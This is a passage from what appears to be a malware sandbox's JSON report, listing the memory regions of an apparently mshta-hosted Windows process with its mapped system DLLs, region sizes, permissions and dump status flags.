"max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 4653055, "entry_point": 0, "filename": null, "id": "region_714", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:01:02.837", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_715", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:02.837", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_716", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:02.837", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, 
"start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_717", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:02.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_718", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:01:02.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_719", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:02.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_720", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:02.877", "type": "region", "version": 1 }, { "dump": 
{ "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_721", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:02.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_722", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:02.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_723", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:02.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], 
"ref_process_dump": null, "size": 897024, "start_va": 8791790583808, "type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_724", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:02.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 5701631, "entry_point": 0, "filename": null, "id": "region_726", "name": "private_0x0000000000470000", "norm_filename": null, "region_type": "private_memory", "start_va": 4653056, "timestamp": "00:01:02.912", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 6160383, "entry_point": 0, "filename": null, "id": "region_727", "name": "private_0x00000000005d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6094848, "timestamp": "00:01:02.912", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 7143424, "type": "region", "version": 1 }, "end_va": 7208959, "entry_point": 0, "filename": null, "id": "region_728", "name": "private_0x00000000006d0000", "norm_filename": null, 
"region_type": "private_memory", "start_va": 7143424, "timestamp": "00:01:02.913", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 7208960, "type": "region", "version": 1 }, "end_va": 8257535, "entry_point": 0, "filename": null, "id": "region_729", "name": "private_0x00000000006e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7208960, "timestamp": "00:01:02.913", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9011200, "start_va": 8791270096896, "type": "region", "version": 1 }, "end_va": 8791279108095, "entry_point": 8791270118592, "filename": "\\Windows\\System32\\mshtml.dll", "id": "region_761", "name": "mshtml.dll", "norm_filename": "c:\\windows\\system32\\mshtml.dll", "region_type": "memory_mapped_file", "start_va": 8791270096896, "timestamp": "00:01:03.124", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2006777856, "type": "region", "version": 1 }, "end_va": 2006806527, "entry_point": 2006782060, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_784", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2006777856, "timestamp": "00:01:03.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not 
monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791791566848, "type": "region", "version": 1 }, "end_va": 8791791988735, "entry_point": 8791791611964, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_785", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791791566848, "timestamp": "00:01:03.182", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002756296, "filename": "\\Windows\\System32\\user32.dll", "id": "region_786", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002649088, "timestamp": "00:01:03.182", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791763779584, "type": "region", "version": 1 }, "end_va": 8791763836927, "entry_point": 8791763783808, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_787", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791763779584, "timestamp": "00:01:03.183", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791792025600, "type": "region", "version": 1 }, "end_va": 8791792848895, "entry_point": 
8791792527476, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_788", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791792025600, "timestamp": "00:01:03.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791766335488, "type": "region", "version": 1 }, "end_va": 8791768444927, "entry_point": 8791766479664, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_789", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791766335488, "timestamp": "00:01:03.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1540096, "start_va": 8791768498176, "type": "region", "version": 1 }, "end_va": 8791770038271, "entry_point": 8791768502496, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_790", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 8791768498176, "timestamp": "00:01:03.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1220608, "start_va": 8791787438080, "type": "region", "version": 1 }, "end_va": 8791788658687, "entry_point": 8791787442388, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_791", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": 
"memory_mapped_file", "start_va": 8791787438080, "timestamp": "00:01:03.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791772299264, "type": "region", "version": 1 }, "end_va": 8791772762111, "entry_point": 8791772372512, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_792", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791772299264, "timestamp": "00:01:03.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2461696, "start_va": 8791763845120, "type": "region", "version": 1 }, "end_va": 8791766306815, "entry_point": 8791763850048, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_793", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 8791763845120, "timestamp": "00:01:03.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791762862080, "type": "region", "version": 1 }, "end_va": 8791763742719, "entry_point": 8791762874996, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_794", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791762862080, "timestamp": "00:01:03.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], 
"info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1470464, "start_va": 8791756374016, "type": "region", "version": 1 }, "end_va": 8791757844479, "entry_point": 8791756378304, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_795", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 8791756374016, "timestamp": "00:01:03.191", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791756046336, "type": "region", "version": 1 }, "end_va": 8791756107775, "entry_point": 8791756050464, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_796", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 8791756046336, "timestamp": "00:01:03.192", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 8791630807040, "type": "region", "version": 1 }, "end_va": 8791631048703, "entry_point": 8791630811248, "filename": "\\Windows\\System32\\msls31.dll", "id": "region_797", "name": "msls31.dll", "norm_filename": "c:\\windows\\system32\\msls31.dll", "region_type": "memory_mapped_file", "start_va": 8791630807040, "timestamp": "00:01:03.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 
8791740448768, "type": "region", "version": 1 }, "end_va": 8791740497919, "entry_point": 8791740452964, "filename": "\\Windows\\System32\\version.dll", "id": "region_798", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791740448768, "timestamp": "00:01:03.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 167936, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 954367, "entry_point": 790544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_799", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 786432, "timestamp": "00:01:03.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 8257536, "type": "region", "version": 1 }, "end_va": 9863167, "entry_point": 0, "filename": null, "id": "region_800", "name": "pagefile_0x00000000007e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8257536, "timestamp": "00:01:03.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791759519744, "type": "region", "version": 1 }, "end_va": 8791759708159, "entry_point": 8791759523856, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_802", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", 
"start_va": 8791759519744, "timestamp": "00:01:03.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791788683264, "type": "region", "version": 1 }, "end_va": 8791789768703, "entry_point": 8791788687460, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_803", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791788683264, "timestamp": "00:01:03.198", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9895936, "type": "region", "version": 1 }, "end_va": 11472895, "entry_point": 0, "filename": null, "id": "region_807", "name": "pagefile_0x0000000000970000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9895936, "timestamp": "00:01:03.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 11534336, "type": "region", "version": 1 }, "end_va": 32505855, "entry_point": 0, "filename": null, "id": "region_808", "name": "pagefile_0x0000000000b00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11534336, "timestamp": "00:01:03.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ 
"readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_809", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:03.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 794623, "entry_point": 0, "filename": null, "id": "region_810", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:03.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 851968, "filename": "\\Windows\\System32\\en-US\\mshta.exe.mui", "id": "region_811", "name": "mshta.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\mshta.exe.mui", "region_type": "memory_mapped_file", "start_va": 851968, "timestamp": "00:01:03.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_820", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", 
"start_va": 917504, "timestamp": "00:01:03.288", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_821", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:01:03.288", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791754276864, "type": "region", "version": 1 }, "end_va": 8791754338303, "entry_point": 8791754280976, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_834", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754276864, "timestamp": "00:01:03.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 34209792, "type": "region", "version": 1 }, "end_va": 35258367, "entry_point": 0, "filename": null, "id": "region_837", "name": "private_0x00000000020a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34209792, "timestamp": "00:01:03.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], 
"ref_process_dump": null, "size": 184320, "start_va": 8791738548224, "type": "region", "version": 1 }, "end_va": 8791738732543, "entry_point": 8791738552336, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_838", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791738548224, "timestamp": "00:01:03.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092874752, "type": "region", "version": 1 }, "end_va": 8796092882943, "entry_point": 0, "filename": null, "id": "region_839", "name": "private_0x000007fffffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092874752, "timestamp": "00:01:03.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791772823552, "type": "region", "version": 1 }, "end_va": 8791773159423, "entry_point": 8791772827860, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_840", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791772823552, "timestamp": "00:01:03.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_841", 
"name": "pagefile_0x0000000000100000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1048576, "timestamp": "00:01:03.435", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1118207, "entry_point": 0, "filename": null, "id": "region_842", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:01:03.437", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 512000, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1691647, "entry_point": 1179648, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_846", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 1179648, "timestamp": "00:01:03.463", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 512000, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1691647, "entry_point": 1232584, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_847", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 1179648, "timestamp": "00:01:03.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", 
"writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791719804928, "type": "region", "version": 1 }, "end_va": 8791720157183, "entry_point": 8791719852992, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_848", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791719804928, "timestamp": "00:01:03.476", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000849-addr_0x00000000021a0000-size_0x00000000001f0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_139", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2031616, "start_va": 35258368, "type": "region", "version": 1 }, "end_va": 37289983, "entry_point": 0, "filename": null, "id": "region_849", "name": "private_0x00000000021a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35258368, "timestamp": "00:01:03.478", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 6160384, "type": "region", "version": 1 }, "end_va": 7073791, "entry_point": 0, "filename": null, "id": "region_854", "name": "pagefile_0x00000000005e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6160384, "timestamp": "00:01:03.486", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791715741696, "type": "region", "version": 1 }, "end_va": 8791715839999, 
"entry_point": 8791715746096, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_855", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 8791715741696, "timestamp": "00:01:03.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 37289984, "type": "region", "version": 1 }, "end_va": 40235007, "entry_point": 37289984, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_863", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 37289984, "timestamp": "00:01:03.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 40239104, "type": "region", "version": 1 }, "end_va": 43659263, "entry_point": 0, "filename": null, "id": "region_864", "name": "pagefile_0x0000000002660000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 40239104, "timestamp": "00:01:03.517", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 8791754080256, "type": "region", "version": 1 }, "end_va": 8791754231807, "entry_point": 8791754118744, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_865", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 
8791754080256, "timestamp": "00:01:03.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791773216768, "type": "region", "version": 1 }, "end_va": 8791787405311, "entry_point": 8791773728444, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_866", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791773216768, "timestamp": "00:01:03.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_867", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:01:03.523", "type": "region", "version": 1 }, { "dump": { 